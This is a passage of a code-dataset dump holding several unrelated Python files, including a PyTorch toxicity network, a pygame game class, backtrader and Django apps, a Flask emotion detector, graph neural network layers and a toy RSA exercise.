self.linear(x)\n\t\t# nonlinear sigmoid activation\n\t\tm_sigmoid = self.sigmoid(m_linear)\n\t\treturn m_sigmoid\n\n\n## This function defines the structure of whole neural network for DTox model\nclass DToxNet(nn.Module):\n\t## 0. Input arguments\n\t\t# node_children_dict: dictionary that contains children nodes of each parent node in DTox model \n\t\t# input_module_size: list/array that contains the input size of each node module in DTox model \n\t\t# output_module_size: list/array that contains the input size of each node module in DTox model \n\t\t# root: list/array that contains number IDs of root pathways in DTox model\n\t\t# output_root_size: size of root module in DTox model \n\t\t# input_feature_size: number of input features \n\n\t## 1. Define neural network parameters \n\tdef __init__(self, node_children_dict, input_module_size, output_module_size, root, output_root_size, input_feature_size):\n\t\tsuper(DToxNet, self).__init__()\n\t\t# iterate by order of node module in DTox model\n\t\tself.net = nn.ModuleList()\n\t\tself.auxiliary = nn.ModuleList()\n\t\tfor lims in range(0, len(input_module_size)):\n\t\t\t# define root loss-oriented structure for the current node \n\t\t\tnet_module = DToxNetModule(input_module_size[lims], output_module_size[lims])\n\t\t\tself.net.append(net_module)\n\t\t\t# define auxiliary loss-oriented structure for the current node \n\t\t\tauxiliary_module = DToxNetAuxiliary(output_module_size[lims])\n\t\t\tself.auxiliary.append(auxiliary_module)\n\t\t# define structure for root module\n\t\tself.output_layer = DToxNetAuxiliary(output_root_size)\n\t\t# define other parameters\n\t\tself.node_children = node_children_dict\n\t\tself.root_node = root\n\t\tself.input_size = input_feature_size\n\t\tself.hidden_size = len(input_module_size)\n\t\tself.combine_size = input_feature_size + len(input_module_size)\n\t\n\t## 2. Define forward function \n\tdef forward(self, x):\n\t\t# iterate by order of input features, assign feature values to result list \n\t\tlayer_result = [0] * self.combine_size\n\t\tauxiliary_result = [0] * self.hidden_size\n\t\tfor sis in range(0, self.input_size):\n\t\t\t# assign values of current feature to result list\n\t\t\tlayer_result[sis] = x[:, sis:(sis+1)]\t\n\t\t# iterate by order of hidden node modules \n\t\tfor scs in range(self.input_size, self.combine_size):\n\t\t\t# obtain input values for the current node \n\t\t\tscs_children = self.node_children[scs]\n\t\t\tscs_children_output_list = [layer_result[sc] for sc in scs_children]\n\t\t\tscs_children_output = torch.cat(scs_children_output_list, 1)\n\t\t\t# feed input values into root loss-oriented structure to compute node output \n\t\t\tscs_net_id = scs - self.input_size\n\t\t\tlayer_result[scs] = self.net[scs_net_id](scs_children_output)\n\t\t\t# feed input values into auxiliary loss-oriented structure to compute auxiliary node output\n\t\t\tauxiliary_result[scs_net_id] = self.auxiliary[scs_net_id](layer_result[scs])\n\t\t# obtain values for root node \n\t\troot_output_list = [layer_result[srn] for srn in self.root_node]\n\t\troot_output = torch.cat(root_output_list, 1)\n\t\t# feed values into root structure to compute final output \n\t\ty_pred = self.output_layer(root_output)\n\t\treturn y_pred, auxiliary_result\n","repo_name":"yhao-compbio/DTox","sub_path":"src/dtox_nn.py","file_name":"dtox_nn.py","file_ext":"py","file_size_in_byte":4352,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"13667035677","text":"import pygame\r\n\r\n# Définir la classe qui va gérer le projectile de notre joueur\r\n\r\nclass Projectile(pygame.sprite.Sprite) :\r\n def __init__(self, player):\r\n super().__init__()\r\n self.velocity = 5\r\n self.player = player\r\n self.image = pygame.image.load('assets/rasengan.png')\r\n self.image = pygame.transform.scale(self.image, (45, 45))\r\n self.damage = 5\r\n self.rect = self.image.get_rect()\r\n self.rect.x = player.rect.x\r\n self.rect.y = player.rect.y + 193\r\n\r\n def remove(self):\r\n # supprimer projectile quand en dehors de l'écran\r\n self.player.all_projectiles.remove(self)\r\n\r\n def move(self):\r\n self.rect.x += self.velocity\r\n\r\n # verifier si projectile plus présent sur écran\r\n if self.rect.x > 1080 :\r\n self.remove()\r\n","repo_name":"mansourb4/1st_Game","sub_path":"1st-Game-master/projectile.py","file_name":"projectile.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21609997742","text":"from utils import lines, read_data\n\n\nclass AssembunnyRunner(object):\n def __init__(self, data, initial=None):\n self.registers = {'a': 0, 'b': 0, 'c': 0, 'd': 0}\n self.registers.update(initial if initial is not None else {})\n self.instructions = [line.split(' ', 1) for line in lines(data)]\n\n def parse_value(self, source):\n try:\n return int(source)\n except ValueError:\n return self.registers[source]\n\n def __call__(self):\n i = 0\n while i < len(self.instructions):\n inst, args = self.instructions[i]\n if inst == 'cpy':\n source, target = args.split(' ')\n self.registers[target] = self.parse_value(source)\n elif inst == 'inc':\n self.registers[args] += 1\n elif inst == 'dec':\n self.registers[args] -= 1\n elif inst == 'jnz':\n flag, offset = args.split(' ')\n if self.parse_value(flag):\n i += int(offset) - 1\n i += 1\n\n\ndef get_a_register(data, initial=None):\n runner = AssembunnyRunner(data, initial)\n runner()\n return runner.registers['a']\n\n\nif __name__ == '__main__':\n data = read_data(12)\n\n assert get_a_register(\n \"\"\"\n cpy 41 a\n inc a\n inc a\n dec a\n jnz a 2\n dec a\n \"\"\"\n ) == 42\n print(\"All tests passed\")\n\n print(get_a_register(data))\n print(get_a_register(data, {'c': 1}))\n","repo_name":"julianandrews/adventofcode","sub_path":"2016/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"11310996486","text":"import backtrader as bt\nimport backtrader.indicators as btind\nfrom spe.cust_ind import NEW_HIGH_STOP70\nfrom spe.cust_ind import NEW_HIGH\n\nclass abcd(bt.Strategy):\n params = (\n ('trade_size', 1),\n ('benchmark_name', 'NSEI'),\n ('tick_size', 0.0005),\n )\n\n def __init__(self):\n\n self.inds = dict()\n\n for d in self.datas :\n if d._name == self.p.benchmark_name :\n continue\n\n self.inds[d] = dict()\n\n self.inds[d]['newHighCH'] = NEW_HIGH.newHigh(d,subplot=False)\n self.inds[d]['newHigh'] = self.inds[d]['newHighCH'].newHigh\n\n self.inds[d]['newHighStop70CH'] = NEW_HIGH_STOP70.newHighstop70(d,subplot=False)\n self.inds[d]['newHighstop70'] = self.inds[d]['newHighStop70CH'].newHighstop70\n\n self.inds[d]['order'] = None\n\n self.inds[d]['hi'] = d.high\n self.inds[d]['lo'] = d.low\n\n self.inds[d]['eligible'] = False\n\n self.inds[d]['counter'] = 0\n\n self.inds[d]['tradeno'] = 0\n\n self.bar_counter = 0\n\n self.highest_lowest = []\n hi,lo = self.data0.high , self.data0.low\n\n def log(self, txt, dt=None):\n ''' Logging function fot this strategy'''\n dt = dt or self.data.datetime[0]\n if isinstance(dt, float):\n dt = bt.num2date(dt)\n print('%s, %s' % (dt.isoformat(), txt))\n\n def notify_order(self, order):\n if order.status in [order.Accepted]: #Can add order.Submitted to get that details\n # Buy/Sell order submitted/accepted to/by broker - Nothing to do\n self.log('ORDER ACCEPTED', dt=order.created.dt)\n self.order = order\n return\n\n if order.status in [order.Expired]:\n self.log('BUY EXPIRED')\n\n elif order.status in [order.Completed]:\n if order.isbuy():\n self.log(\n 'BUY EXECUTED, Price: %.2f, Cost: %.2f, Comm %.2f' %\n (order.executed.price,\n order.executed.value,\n order.executed.comm))\n\n else: # Sell\n self.log('SELL EXECUTED, Price: %.2f, Cost: %.2f, Comm %.2f' %\n (order.executed.price,\n order.executed.value,\n order.executed.comm))\n\n # Sentinel to None: new orders allowed\n # self.order = None\n\n\n def next(self):\n\n self.bar_counter += 1\n\n for d in self.datas :\n\n if d._name == self.p.benchmark_name :\n continue\n\n # print(self.getposition(data=d).size)\n if self.inds[d]['order']: # check for open orders, if so, then cancel order before issuing new.\n self.cancel(self.inds[d]['order'])\n\n if self.getposition(data=d).size < self.params.trade_size :\n self.inds[d]['order'] = self.buy(data=d,price=self.inds[d]['newHigh'][0],exectype=bt.Order.Stop)\n # print('buy condition met')\n\n if self.getposition(data=d).size > 0 :\n self.inds[d]['counter'] += 1\n self.inds[d]['eligible'] = True\n\n if self.getposition(data=d).size > 0 and d.low[0] < self.inds[d]['newHighstop70'][0]:\n self.inds[d]['order'] = self.close(data=d,price=(d.low[0] * 0.999) ,exectype=bt.Order.Stop)\n # print(\"sell condition met\")\n\n\n if self.getposition(data=d).size == 0 and self.inds[d]['eligible'] :\n self.inds[d]['hi'] = d.high.get(size=self.inds[d]['counter'])\n self.inds[d]['lo'] = d.low.get(size=self.inds[d]['counter'])\n self.inds[d]['eligible'] = False\n # self.highest_lowest.append([self.data.num2date(),max(self.inds[d]['hi']),min(self.inds[d]['lo'])])\n self.inds[d]['tradeno'] += 1\n self.counter = 0\n print('[+] '+d.num2date().strftime(\"%d-%m-%Y\") +' Highest in TradeNo '+ str(self.inds[d]['tradeno']) + ' of ' + str(d._name) +' is := '+ str(max(self.inds[d]['hi'])))\n print('[+] '+d.num2date().strftime(\"%d-%m-%Y\") +' Lowest in TradeNo '+ str(self.inds[d]['tradeno']) + ' of ' + str(d._name) +' is := '+ str(min(self.inds[d]['lo'])))\n\n def candle_lb():\n return 1000","repo_name":"iamclearmind/webAppBackend","sub_path":"spe/strategies/abcd.py","file_name":"abcd.py","file_ext":"py","file_size_in_byte":4322,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74998828306","text":"from .models import Producto, Venta\nfrom django.shortcuts import render, redirect\nfrom .forms import ProductoForm, VentaForm\nfrom django.contrib import messages\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.core import serializers\nfrom django.http import HttpResponse\nimport json\n# Create your views here.\nfrom django.contrib.auth.decorators import login_required\nimport social_django\n\nfrom django.contrib.auth import logout as log_out\nfrom django.conf import settings\nfrom django.http import HttpResponseRedirect\nfrom urllib.parse import urlencode\n\ndef index(request):\n template='index.html'\n ventas= Venta.objects.all()\n jsondata = serializers.serialize('json',ventas)\n context={\n\t\t'results':ventas,\n\t\t'jsondata':jsondata,\n\t}\n return render(request,template,context)\n\ndef productos(request):\n\ttemplate='Producto/productos.html'\n\tresults=Producto.objects.all()\n\tjsondata = serializers.serialize('json',results)\n\tcontext={\n\t\t'results':results,\n\t\t'jsondata':jsondata,\n\t}\n\treturn render(request,template,context)\n\ndef getdata(request):\n\n ventas= Venta.objects.all()\n jsondata = serializers.serialize('json',ventas)\n return HttpResponse(jsondata)\n\ndef base_layout(request):\n\ttemplate='base.html'\n\treturn render(request,template)\n\ndef ProductoList(request):\n queryset = Producto.objects.all()\n context = {\n 'producto_list': queryset\n }\n return render(request, 'Producto/productos.html', context)\n\ndef ProductoCreate(request):\n if request.method == 'POST':\n form = ProductoForm(request.POST)\n if form.is_valid():\n producto = form.save()\n producto.save()\n messages.add_message(request, messages.SUCCESS, 'Producto create successful')\n return HttpResponseRedirect(reverse('productoList'))\n else:\n print(form.errors)\n else:\n form = ProductoForm()\n\n context = {\n 'form': form,\n }\n\n return render(request, 'Producto/productoCreate.html', context)\n\ndef ProductoUpdate(request,pk):\n producto= Producto.objects.get(id=pk)\n if request.method == 'GET':\n form= ProductoForm(instance=producto)\n else:\n form= ProductoForm(request.POST, instance=producto)\n if form.is_valid():\n form.save()\n messages.add_message(request, messages.SUCCESS, 'Producto update successful')\n return HttpResponseRedirect(reverse('productoList'))\n\n context = {\n 'form': form,\n }\n\n return render(request, 'Producto/productoUpdate.html', context)\n\ndef VentaList(request):\n queryset = Venta.objects.all()\n context = {\n 'venta_list': queryset\n }\n return render(request, 'Venta/ventas.html', context)\n\ndef VentaCreate(request):\n if request.method == 'POST':\n form = VentaForm(request.POST)\n if form.is_valid():\n venta = form.save()\n venta.save()\n messages.add_message(request, messages.SUCCESS, 'Venta create successful')\n return HttpResponseRedirect(reverse('ventaCreate'))\n else:\n print(form.errors)\n else:\n form = VentaForm()\n\n context = {\n 'form': form,\n }\n\n return render(request, 'Venta/ventaCreate.html', context)\n\n\n\n\n@login_required\ndef dashboard(request):\n user = request.user\n auth0user = user.social_auth.get(provider='auth0')\n userdata = {\n 'user_id': auth0user.uid,\n 'name': user.first_name,\n 'picture': auth0user.extra_data['picture']\n }\n\n return render(request, 'dashboard.html', {\n 'auth0User': auth0user,\n 'userdata': json.dumps(userdata, indent=4)\n })\n\ndef logout(request):\n log_out(request)\n return_to = urlencode({'returnTo': request.build_absolute_uri('/')})\n logout_url = 'https://%s/v2/logout?client_id=%s&%s' % \\\n (settings.SOCIAL_AUTH_AUTH0_DOMAIN, settings.SOCIAL_AUTH_AUTH0_KEY, return_to)\n return HttpResponseRedirect(logout_url)\n\ndef getRole(request):\n user = request.user\n auth0user = user.social_auth.get(provider=\"auth0\")\n accessToken = auth0user.extra_data['access_token']\n url = \"https://isis2503-ivan-alfonso.auth0.com/userinfo\"\n headers = {'authorization': 'Bearer ' + accessToken}\n resp = requests.get(url, headers=headers)\n userinfo = resp.json()\n role= userinfo['https://isis2503-ivan-alfonso:auth0:com/role']\n return (role)\n","repo_name":"Lala341/ATpost","sub_path":"productos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35566344571","text":"import pandas as pd\nimport numpy as np\nfrom collections import Counter\nimport imblearn as imb\nfrom sklearn.preprocessing import OneHotEncoder\n\n### Reading .pkl file\nnum_chr = '1'\npd_df = pd.read_pickle(f\"/mnt/wd/nsap/imp2/chr{num_chr}.pkl\")\nprint('Original DF: ', pd_df, sep='\\n')\n\n## Saving 1st two columns\nclasses = pd_df['PHENOTYPE']\npd_df_out = pd_df[['IID','PHENOTYPE']].copy()\npd_df.drop(['IID','PHENOTYPE'], axis=1, inplace=True)\n\n### One-Hot encode\nprint('Performing one-hot encoding...')\nenc = OneHotEncoder(sparse=False, handle_unknown='error')\nenc.fit(pd_df)\npd_df_enc = enc.transform(pd_df)\npd_df_columns = enc.get_feature_names_out()\nprint('Encoded...')\n\n### NearMiss-1 selects the positive samples for which the average distance to the N\n### closest samples of the negative class is the smallest.\nprint('Performing NearMiss undersampling...')\nundersample = imb.under_sampling.NearMiss(sampling_strategy='majority',\n version=1,\n n_neighbors=3, \n n_jobs=12)\npd_df_enc, classes = undersample.fit_resample(pd_df_enc, classes)\ncounter = Counter(classes)\nprint('Classes counter: ', counter)\nresampled_idx = undersample.sample_indices_\npd_df_res = pd.DataFrame(pd_df_enc, columns=pd_df_columns, index=resampled_idx)\n\n# ### Oversampling technique SMOTEN (Synthetic Minority Over-sampling Technique for Nominal)\n# print(f\"Original class counts: {Counter(classes)}\")\n# smoten_over = imb.over_sampling.SMOTEN(n_jobs=6)\n# pd_df_res, classes_res = smoten_over.fit_resample(pd_df_enc, classes)\n# print(f\"Class counts after resampling {Counter(classes_res)}\")\n# print('pd_df_res: ', pd_df_res, sep='\\n')\n\n# ### Save new DF\n# pd_df_out = pd.merge(pd_df_out, pd_df_res, left_index=True, right_index=True)\n# print(pd_df_out)\n# pd_df_out.to_pickle(f\"/mnt/wd/nsap/imp2/chr{num_chr}_nearmiss.pkl\")\n","repo_name":"NSapozhnikov/RandomForest_dbgap","sub_path":"resampling.py","file_name":"resampling.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3524153963","text":"#!/usr/bin/env python3\nfrom urwid import MainLoop, \\\n Padding, \\\n LineBox, \\\n Filler, \\\n Edit, \\\n Text, \\\n Widget, \\\n RELATIVE_100\n\n\nclass InputBox(Filler):\n def __init__(self, banner_txt: str):\n super().__init__(self.__set_body(Edit(banner_txt)), top=0)\n\n\n @property\n def body(self):\n return super().body.original_widget.original_widget\n\n def __set_body(self, widget: Widget):\n self._sizing\n self.original_widget = Padding(LineBox(widget), align='center', left=0, width=RELATIVE_100)\n return self.original_widget\n\n def keypress(self, size, key):\n if(key != 'enter'):\n return super(InputBox, self).keypress(size, key)\n greeting_box = Text(f'Why hello there, {self.body.edit_text}')\n self.__set_body(greeting_box)\n\n\n\ndef cmd_handler(cmd):\n print(cmd)\n\n\ndef main():\n event_loop = MainLoop(InputBox('What\\'s yer name, son?: '))\n\n try:\n event_loop.run()\n except KeyboardInterrupt:\n print('Goodbye!')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"oresat/oresat-tpane","sub_path":"examples/urwid_example.py","file_name":"urwid_example.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71097958547","text":"from django.urls import path, include\nfrom .api.views import NoteListCreateAPIView, NoteRetrieveUpdateAPIViewAPIView, GetShareNoteSharedByAPIView, \\\n GetShareNoteWithMeAPIView, CreateSharNoteAPIView, DetailSharedNoteWithAPIView, DetailSharedNoteByAPIView, \\\n TagListViewAPI\n\nurlpatterns = [\n path('sharedwithme/api/v1//', DetailSharedNoteWithAPIView.as_view()),\n path('sharedbyme/api/v1//', DetailSharedNoteByAPIView.as_view()),\n path('api/v1//', NoteRetrieveUpdateAPIViewAPIView.as_view()),\n\n path('api/v1/', NoteListCreateAPIView.as_view()),\n path('share/api/v1/', CreateSharNoteAPIView.as_view()),\n path('sharedbyme/api/v1/', GetShareNoteSharedByAPIView.as_view()),\n path('sharedwithme/api/v1/', GetShareNoteWithMeAPIView.as_view()),\n path('tags/api/v1/', TagListViewAPI.as_view()),\n\n\n]\n","repo_name":"ishtiaque2asad2/technotesplus","sub_path":"technoteplus/note/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73216682704","text":"from flask import Flask, request, send_file, jsonify, render_template, make_response\nfrom keras.models import load_model\nfrom keras.preprocessing.image import img_to_array\nfrom io import BytesIO\nimport cv2\nimport numpy as np\n\napp = Flask(__name__)\n\n# Load the models\nface_classifier = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\nclassifier = load_model(\"model.h5\")\nemotion_labels = ['Angry', 'Disgust', 'Fear', 'Happy', 'Neutral', 'Sad', 'Surprise']\n\n@app.route('/')\ndef index():\n # Serving the frontend HTML (assuming it's named 'index.html' in a 'templates' folder)\n return render_template('index.html')\n\n@app.route('/detect-emotion', methods=['POST'])\ndef detect_emotion():\n file = request.files['image']\n if not file:\n return jsonify({'error': 'no file uploaded'}), 400\n\n frame = cv2.imdecode(np.frombuffer(file.read(), dtype=np.uint8), cv2.IMREAD_COLOR)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = face_classifier.detectMultiScale(gray)\n\n for (x, y, w, h) in faces:\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 255), 2)\n roi_gray = gray[y:y+h, x:x+w]\n roi_gray = cv2.resize(roi_gray, (48, 48), interpolation=cv2.INTER_AREA)\n\n if np.sum([roi_gray]) != 0:\n roi = roi_gray.astype('float') / 255.0\n roi = img_to_array(roi)\n roi = np.expand_dims(roi, axis=0)\n\n prediction = classifier.predict(roi)[0]\n label = emotion_labels[prediction.argmax()]\n \n label_position = (x, y)\n cv2.putText(frame, label, label_position, cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)\n\n _, buffer = cv2.imencode('.png', frame)\n response = make_response(buffer.tobytes())\n response.headers['Content-Type'] = 'image/png'\n return response\n\n\n\n # return send_file(response, mimetype='image/png')\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"NitinsaiAvirneni/Face_Detection_Using_CNN_Via_Flask_API","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14524188101","text":"import random\r\ndef gcd(a,b): #расширенный\r\n x, lasty=0,0\r\n y, lastx=1,1\r\n n=a\r\n m=b\r\n while m!=0:\r\n q=n//m\r\n r=n%m\r\n n=m\r\n m=r\r\n x, lastx = lastx-q*x, x\r\n y, lasty = lasty-q*y, y\r\n return n\r\n\r\ndef gcdost(a,b): #расширенный\r\n x, lasty=0,0\r\n y, lastx=1,1\r\n n=a\r\n m=b\r\n while m!=0:\r\n q=n//m\r\n r=n%m\r\n n=m\r\n m=r\r\n x, lastx = lastx-q*x, x\r\n y, lasty = lasty-q*y, y\r\n return lastx\r\n\r\ndef pmnoj(a):\r\n p = []\r\n d = 2\r\n while d * d <= a:\r\n if a % d == 0:\r\n p.append(d)\r\n a //= d\r\n else:\r\n d += 1\r\n if a > 1:\r\n p.append(a)\r\n return p\r\n\r\ndef ferma(c):\r\n for i in range(1000):\r\n a=random.randint(2, c-2)\r\n b=a**(c-1)%c\r\n if b==1:\r\n return True\r\n else:\r\n return False\r\n\r\ndef rsa(st1, p,q):\r\n st2=[]\r\n res=[]\r\n res2=[]\r\n p1=ferma(p)\r\n q1=ferma(q)\r\n if not p1 or not q1:\r\n return \"Error\"\r\n for i in range(len(st1)):\r\n for j in range(len(alf)):\r\n if st1[i]==alf[j]:\r\n st2.append(zam[j])\r\n n=p*q\r\n fn=(p-1)*(q-1)\r\n i=2\r\n while i < fn:\r\n e=gcd(fn,i)\r\n if e==1:\r\n e=i\r\n break\r\n i+=1\r\n d=gcdost(e,fn)\r\n if d<0:\r\n d+=fn\r\n for i in st2:\r\n res.append((i**e)%n)\r\n for i in res:\r\n res2.append((i**d)%n)\r\n return res,res2\r\n\r\n\r\nalf=[\"а\",\"б\",\"в\",\"г\",\"д\",\"е\",\"ё\",\"ж\",\"з\",\"и\",\"й\",\"к\",\"л\",\"м\",\"н\",\"о\",\"п\",\"р\",\"с\",\"т\",\"у\",\"ф\",\"х\",\"ц\",\"ч\",\"ш\",\"щ\",\"ъ\",\"ы\",\"ь\",\"э\",\"ю\",\"я\",\".\",\",\",\":\",\"?\"]\r\nzam=[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36]\r\np=17\r\nq=11\r\nfile=open('text.txt',encoding='utf-8')\r\nst1=list(file.read())\r\nfile.close()\r\nprint(st1)\r\nf,f2=rsa(st1,p,q)\r\ns=sum(f)\r\nprint(s)\r\nprint(f,f2)\r\n\r\n","repo_name":"0awawa0/DonNU_CTF","sub_path":"2021_2022/Training_2/RSA_Dream/Cripto_9.py","file_name":"Cripto_9.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39951442629","text":"#using socket\nfrom socket import *\n\n#setting ip as localhost and port number\nserverName=\"localhost\"\nserverPort=1234\n\n#socket setting with ipv4 and tcp protocol\nclientSocket=socket(AF_INET,SOCK_STREAM)\n#connect to server using connect function\nclientSocket.connect((serverName,serverPort))\n\n#sending a GET request to the server\nrequest = 'GET /requestedFile.html HTTP/1.1\\r\\n\\r\\n'\nclientSocket.send(request.encode())\nanswer=clientSocket.recv(2048)\nprint(answer.decode())\n\n#get requestedfile\nanswer1=clientSocket.recv(2048)\nanswer2=clientSocket.recv(2048)\nanswer3=clientSocket.recv(2048)\n\n#print the return\nprint(answer1.decode())\nprint(answer2.decode())\nprint(answer3.decode())\n\n#socket close\nclientSocket.close()","repo_name":"hoonsw/mycodes","sub_path":"Undergraduate/Network/HW2-2014310375/TCPclient3.py","file_name":"TCPclient3.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17805503984","text":"# @Time : 2021/4/9 11:09\r\n# @Author : Scewiner, Xu, Mingzhou\r\n# @File: Grapg_layer.py.py\r\n# @Software: PyCharm\r\n# from dgl.nn.pytorch import HeteroGraphConv\r\nimport torch\r\nimport torch.nn as nn\r\nimport fairseq.utils as utils\r\nfrom fairseq.modules import LayerNorm\r\nimport torch.nn.functional as F\r\nfrom .GraphDense import GCNLayer,GATLayer\r\n\r\n\r\n\r\n\r\nclass GraphLayer(nn.Module):\r\n def __init__(self, args):\r\n super(GraphLayer, self).__init__()\r\n self.drop = getattr(args, 'gcn_drop', 0.2)\r\n self.hidden_size = args.encoder_embed_dim\r\n self.num_head = args.encoder_attention_heads\r\n self.num_layers = args.ctx_layer\r\n self.activation_fn = utils.get_activation_fn(activation='tanh')\r\n self.activation_relu = utils.get_activation_fn(activation='relu')\r\n self.layers = nn.ModuleList([])\r\n self.layers.extend([\r\n self.build_layer('GCN') for _ in range(self.num_layers)\r\n ])\r\n self.GAT = self.build_layer('GAT')\r\n\r\n def build_layer(self, layer_type='GCN'):\r\n if layer_type == 'GCN':\r\n m = GCNLayer(self.hidden_size, self.hidden_size)\r\n elif layer_type == \"GAT\":\r\n m = GATLayer(self.hidden_size, self.hidden_size)\r\n else:\r\n raise NotImplementedError\r\n return m\r\n\r\n\r\n def forward(self, g_reps, graph, edge_type='forward'):\r\n residual = g_reps\r\n g = graph[0]\r\n if edge_type == 'backward':\r\n g = g.transpose(0,1)\r\n# g = g.to_dense()\r\n\r\n for layer in self.layers:\r\n g_reps = layer(g_reps,g)\r\n g_reps = self.activation_fn(g_reps)\r\n g_reps = F.dropout(g_reps, p=self.drop)\r\n g_reps = g_reps + residual\r\n g = graph[-1]\r\n# g = graph[1].to_dense()\r\n # g = g.allow_zero_in_degree=True\r\n # making sentence representation\r\n output = self.GAT(g_reps,g)\r\n output = self.activation_relu(output)\r\n return output\r\n\r\n\r\n\r\nclass GraphEncoders(nn.Module):\r\n def __init__(self, args):\r\n super(GraphEncoders, self).__init__()\r\n self.shared_layers = getattr(args, \"shared_layers\", False)\r\n if self.shared_layers:\r\n self.layers = GraphLayer(args)\r\n else:\r\n self.layers = nn.ModuleList([])\r\n self.layers.extend([\r\n GraphLayer(args) for _ in range(2)\r\n ])\r\n self.ln_layers = nn.ModuleList([])\r\n self.ln_layers.extend([LayerNorm(args.encoder_embed_dim) for _ in range(2)])\r\n self.final_layer_ln = LayerNorm(args.encoder_embed_dim)\r\n self.edge_type = ['forward', 'backward']\r\n self.gate_units = GateUnit(args.encoder_embed_dim)\r\n self.drop = getattr(args, 'gcn_drop', 0.2)\r\n\r\n def forward(self, g_reps, graph):\r\n residual = g_reps\r\n output = []\r\n if self.shared_layers:\r\n for i in range(2):\r\n if i == 0:\r\n x = self.ln_layers[i](g_reps)\r\n else:\r\n x = self.ln_layers[i](residual)\r\n x = F.dropout(x, p=self.drop, training=self.training)\r\n edge_type = self.edge_type[i]\r\n x = self.layers(x, graph, edge_type)\r\n x = F.dropout(x, p=self.drop, training=self.training)\r\n output.append(x)\r\n else:\r\n for edge_type, ln_layer, layer in zip(self.edge_type, self.ln_layers, self.layers):\r\n x = ln_layer(g_reps) if edge_type == 'forward' else ln_layer(residual)\r\n x = F.dropout(x, self.drop, training=self.training)\r\n x = layer(x, graph, edge_type)\r\n x = F.dropout(x, p=0.1, training=self.training)\r\n output.append(x)\r\n output = self.gate_units(*output)\r\n output = self.final_layer_ln(output)\r\n return output\r\n\r\n\r\n\r\ndef build_linear(in_feat, out_feat, bias=True):\r\n m = nn.Linear(in_feat, out_feat, bias=bias)\r\n nn.init.xavier_uniform_(m.weight)\r\n if bias:\r\n nn.init.constant_(m.bias, 0)\r\n return m\r\n\r\n\r\nclass GateUnit(nn.Module):\r\n def __init__(self, hidden_size):\r\n super(GateUnit, self).__init__()\r\n self.x_weight = build_linear(hidden_size, hidden_size)\r\n self.y_weight = build_linear(hidden_size, hidden_size)\r\n\r\n def forward(self, x, y):\r\n gate = torch.sigmoid(self.x_weight(x) + self.y_weight(y))\r\n return gate * x + (1 - gate) * y\r\n","repo_name":"scewiner/DocGraph","sub_path":"GraphLayer.py","file_name":"GraphLayer.py","file_ext":"py","file_size_in_byte":4471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38360937088","text":"# MOTOR CONTROL\n\nshutdown=['SHUTDOWN','SHUT']\nmov=['MOVE','MOTORS','LOCOMOTION','MOVING']\nfwd=['FORWARD','STRAIGHT','F']\nbak=['BACKWARD','BACK','B']\nrit=['RIGHT','R']\nlft=['LEFT','L']\nstp=['S','STOP','BRAKE','BRAKES']\n\nmovement_access= mov+fwd+bak+rit+lft # To know if the user is requesting movement .\n\n#==============================================================================================\n\ngreet=['HI','HELLO','AFTERNOON','MORNING']\naffirmation = ['YES','YEP','YEAH','Y','SURE']\nnegation = ['NO','NOPE','NAH','N','NEVER','LATER']\nhpy=['GOOD','COOL','AMAZING','AWESOME']\n\n\n\n\n\n\n","repo_name":"2602GS1999/REFORESTATION-ROVER-CONTROLED-OVER-VNC-DIRECTLY","sub_path":"INPUT.py","file_name":"INPUT.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4073452019","text":"import ast\nimport json\nimport logging\n\nimport django\nimport itertools\nimport operator\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.db.models import Q\nfrom django.db.models.base import ModelState\nfrom django.db.models.fields.related import ReverseSingleRelatedObjectDescriptor, ForeignObjectRel\nfrom django.db.models.query import QuerySet\nfrom django.core import exceptions\nfrom django.db.models.fields import Field\nfrom django.utils.functional import cached_property\n\nlogger = logging.getLogger(__name__)\n\n\nclass NoDbQuery(object):\n def __init__(self, q=None, ordering=None):\n self._q = q\n self._ordering = [] if ordering is None else ordering\n\n def can_filter(self):\n return True\n\n def add_q(self, q):\n self._q = q if self._q is None else self._q & q\n\n def clone(self):\n tmp = NoDbQuery()\n tmp._q = self._q.clone() if self._q is not None else None\n tmp._ordering = self._ordering[:]\n return tmp\n\n def 